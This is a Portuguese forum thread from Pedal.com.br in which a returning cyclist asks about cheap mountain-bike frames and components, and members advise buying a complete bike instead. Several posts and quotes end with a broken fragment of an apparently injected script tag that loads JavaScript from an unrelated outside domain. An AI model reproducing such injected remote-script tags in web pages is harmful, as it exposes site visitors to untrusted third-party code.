Pedal.com.br Página inicial
Fórum Inicial Fórum Inicial > Fórum Mountain Biking > Cross-Country / Maratona / Eliminator / Uphill
  Novas Mensagens Novas Mensagens RSS Feed - Quadro para iniciar no MTB.
   [REGRAS]    FAQ FAQ  Pesquisar no Fórum   Registrar Registrar  Entrar Entrar

Utilizamos cookies para melhorar a sua experiencia no site. Ao continuar navegando voce concorda com a nossa politica de privacidade.


Quadro para iniciar no MTB.

 Responder
Autor
Mensagem
  Tópico Pesquisar Tópico Pesquisar  Opções do Tópico Opções do Tópico
Kling.thiago Ver Drop Down
Avatar

Cadastrado em: 04 Mar 2018
Ibitipoca MG
Offline
Mensagens:5
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Kling.thiago Citar  ResponderResponder Link direto para este Post Tópico: Quadro para iniciar no MTB.
    Postado: 21 Fev 2019 as 22:54
Olá pessoal. Tudo bem?

Sou novato no fórum, e posso dizer que no MTB também. Pedalei bstante de "cros-inha" na adolescencia, mas depois parei e agora, aos 31, pretendo retornar, mas indo pra terra, afinal, quando parei com a bike, fui pras montanhas. Agora quero juntar os dois mundos. Terra e bike.

Tenho pesquisado um quadro de até 500$, e investir em componentes melhores, pois entendo que a principio, serão estredas de terra mais tranquilas, então o quadro não vai tomar tanta porrada.

Sendo assim, vou listar uns que chei de até 500pilas que me interessaram:

GTSm1 i-Vtec
VikingX ultra
First lift
Gta nx9
Mosso rampage
Toten b202
Kapa sigma

Dentre estas opções...
Quais sugerem?

Sei que pelo valor jamais sejá pra casar...
Mas é apenas pra pegar ritmo, ate que um dia invista em algo realmente bom.

Gratidão pessoal.
Voltar ao Topo
jh1991 Ver Drop Down


Cadastrado em: 24 Out 2016
bh
Offline
Mensagens:1582
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar jh1991 Citar  ResponderResponder Link direto para este Post Postado: 21 Fev 2019 as 23:13
No final quanto pretende gastar?
Se inscrevam no youtube.
https://www.youtube.com/c/bikeestilo?sub_confirmation=1
Voltar ao Topo
miniic Ver Drop Down


Cadastrado em: 08 Jul 2010
Curitiba
Offline
Mensagens:999
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar miniic Citar  ResponderResponder Link direto para este Post Postado: 22 Fev 2019 as 08:41
Já tem os componentes ou vai comprar tudo separado?
Montar bike ainda mais nessa faixa não vale muito a pena...
Voltar ao Topo
Kling.thiago Ver Drop Down
Avatar

Cadastrado em: 04 Mar 2018
Ibitipoca MG
Offline
Mensagens:5
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Kling.thiago Citar  ResponderResponder Link direto para este Post Postado: 22 Fev 2019 as 12:06
Olá pessoal.
Então...

Vou comprar os componentes pouco a pouco. Não tenho nada ainda.
Estou montando uma planilha com os componentes que pretendo adquirir. 
Tudo, no mercado livre, está saindo a R$ 2776,00 (sem frete)

Ficou assim:

  • Quadro First Active | tam: 17 (Tenho 1,74mts) 
  • Aro Vzan Xtreme
  • Conjunto de mesa, guidão e canote First
  • Grupo Shimano de freio e câmbio Tourney
  • RapidFire Shimano Tourney
  • Selim First
  • Paralamas
  • Suspenção Ar/hidraulica GTA RX com trava no guidão
  • Câmaras de Ar Pirelli
  • Cubos Shimano Tourney

Sei que futuramente precisarei fazer upgrades, mas aí estes itens serão incorporados a bike da patroa que pretende um uso mais urbano. 
O que acham?
< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
 
Voltar ao Topo
miniic Ver Drop Down


Cadastrado em: 08 Jul 2010
Curitiba
Offline
Mensagens:999
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar miniic Citar  ResponderResponder Link direto para este Post Postado: 22 Fev 2019 as 12:09
2700 com tourney (imagino que é disco mecânico inclusive) e suspensão GTA Confused
A Caloi Moab fica nessa faixa de preço, suspensão rock shox e conjunto todo alívio (freio hidráulico).
Tem muita coisa melhor pelo mesmo dinheiro.

Originalmente postado por Kling.thiago Kling.thiago escreveu:

Olá pessoal.
Então...

Vou comprar os componentes pouco a pouco. Não tenho nada ainda.
Estou montando uma planilha com os componentes que pretendo adquirir. 
Tudo, no mercado livre, está saindo a R$ 2776,00 (sem frete)

Ficou assim:

  • Quadro First Active | tam: 17 (Tenho 1,74mts) 
  • Aro Vzan Xtreme
  • Conjunto de mesa, guidão e canote First
  • Grupo Shimano de freio e câmbio Tourney
  • RapidFire Shimano Tourney
  • Selim First
  • Paralamas
  • Suspenção Ar/hidraulica GTA RX com trava no guidão
  • Câmaras de Ar Pirelli
  • Cubos Shimano Tourney

Sei que futuramente precisarei fazer upgrades, mas aí estes itens serão incorporados a bike da patroa que pretende um uso mais urbano. 
O que acham?
< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
 
Voltar ao Topo
ghd Ver Drop Down
Avatar

Cadastrado em: 19 Nov 2016
SP
Offline
Mensagens:4040
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar ghd Citar  ResponderResponder Link direto para este Post Postado: 22 Fev 2019 as 12:24
Não vale a pena!
Há vários topicos no fórum sobre pessoas que iam montar e viram que não vale a pena. De uma pesquisada.
Voltar ao Topo
Kling.thiago Ver Drop Down
Avatar

Cadastrado em: 04 Mar 2018
Ibitipoca MG
Offline
Mensagens:5
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Kling.thiago Citar  ResponderResponder Link direto para este Post Postado: 22 Fev 2019 as 12:34
Então...
Achei essa Caloi por R$2,500 e realmente me interessou. 
Porém não disponho da grana no momento, e iria montar aos poucos. 

E gostei de verdade do quadro da First shshsh
será que conseguiria passar as peças da Caloi pra um Quadro desses, ou o Active ou o Athymus, assim pegaria esse quadro Caloi e passaria pra Patroa. < ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
Voltar ao Topo
Delanes Ver Drop Down
Avatar

Cadastrado em: 23 Fev 2019
Juiz de Fora MG
Offline
Mensagens:3
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Delanes Citar  ResponderResponder Link direto para este Post Postado: 23 Fev 2019 as 21:28
Cara, comprei uma ontem mais barato (2,599), frete grátis, com kit Alívio da Shimano..dá uma olhada lá:
https://produto.mercadolivre.com.br/MLB-810544574-bicicleta-first-29-shimano-alivio-27v-m4050-disc-hid-brinde-_JM
Voltar ao Topo
Delanes Ver Drop Down
Avatar

Cadastrado em: 23 Fev 2019
Juiz de Fora MG
Offline
Mensagens:3
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Delanes Citar  ResponderResponder Link direto para este Post Postado: 23 Fev 2019 as 21:30
E tem promoção lá por quadros menores ...
Voltar ao Topo
miniic Ver Drop Down


Cadastrado em: 08 Jul 2010
Curitiba
Offline
Mensagens:999
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar miniic Citar  ResponderResponder Link direto para este Post Postado: 24 Fev 2019 as 07:52
O que você quer dizer com não consigo comprar agora e vou montando aos poucos?
A Caloi tem em várias lojas, pode parcelar tipo no cartão e pagar aos poucos.
Se não tem nada não vejo sentido em comprar em um mês o quadro, noutro os freios, noutro as rodas, depois os pneus... Vai conseguir andar na bike na mesma data se tivesse juntado a grana e comprado uma pronta.

Veja que a bike que o colega postou usa suspensão GTA (sabe-se lá onde vai conseguir fazer manutenção disso, durabilidade é peças de reposição) e movimento central ponta quadrada! Esteja ciente que é uma bike inferior...

Se tem pouca grana olha na tabela do tópico que mandei, tem opções por cerca de 1000 reais...

Originalmente postado por Kling.thiago Kling.thiago escreveu:

Então...
Achei essa Caloi por R$2,500 e realmente me interessou. 
Porém não disponho da grana no momento, e iria montar aos poucos. 

E gostei de verdade do quadro da First shshsh
será que conseguiria passar as peças da Caloi pra um Quadro desses, ou o Active ou o Athymus, assim pegaria esse quadro Caloi e passaria pra Patroa. < ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
Voltar ao Topo
Delanes Ver Drop Down
Avatar

Cadastrado em: 23 Fev 2019
Juiz de Fora MG
Offline
Mensagens:3
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Delanes Citar  ResponderResponder Link direto para este Post Postado: 25 Fev 2019 as 01:21
Infelizmente é difícil de achar a bike perfeita. Tbm estava na mesma situação sua: montar ou não? Se fosse montar, só o kit Alívio (passadores, freios, câmbios..) vale perto dos 2,000.00. Eu tenho todos os preços mais baixos anotados. Essa bike que comprei, pra mim, foi a mais "completa" que encontrei em 3 semanas de pesquisa. Realmente o movimento central e o pedivela não é dos melhores, mas não me preocupam pois tbm estou voltando a pedalar depois de anos... Realmente a suspensão será trocada daqui a uns meses mas será depois de bastante uso.
Concluindo: particularmente prefiro ter uma bike próxima do que quero e sendo usada (e foi dividida em 12x) do que ir montando mês a mês e não estar pedalando (além de ficar mais cara..)
Espero ter ajudado... abraços
Voltar ao Topo
KleytonKivel Ver Drop Down
Avatar

Cadastrado em: 21 Ago 2018
Palhoça - SC
Offline
Mensagens:23
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar KleytonKivel Citar  ResponderResponder Link direto para este Post Postado: 03 Mar 2019 as 21:55
Eu comprei uma Endorphine 5.3 na Netshoes e fui comprando componentes da china, estou muito satisfeito.
Voltar ao Topo
 Responder

Permissões do Fórum Ver Drop Down

Forum Software by Web Wiz Forums® version 12.07
Copyright ©2001-2024 Web Wiz Ltd.

 
 
 
 
 
 

X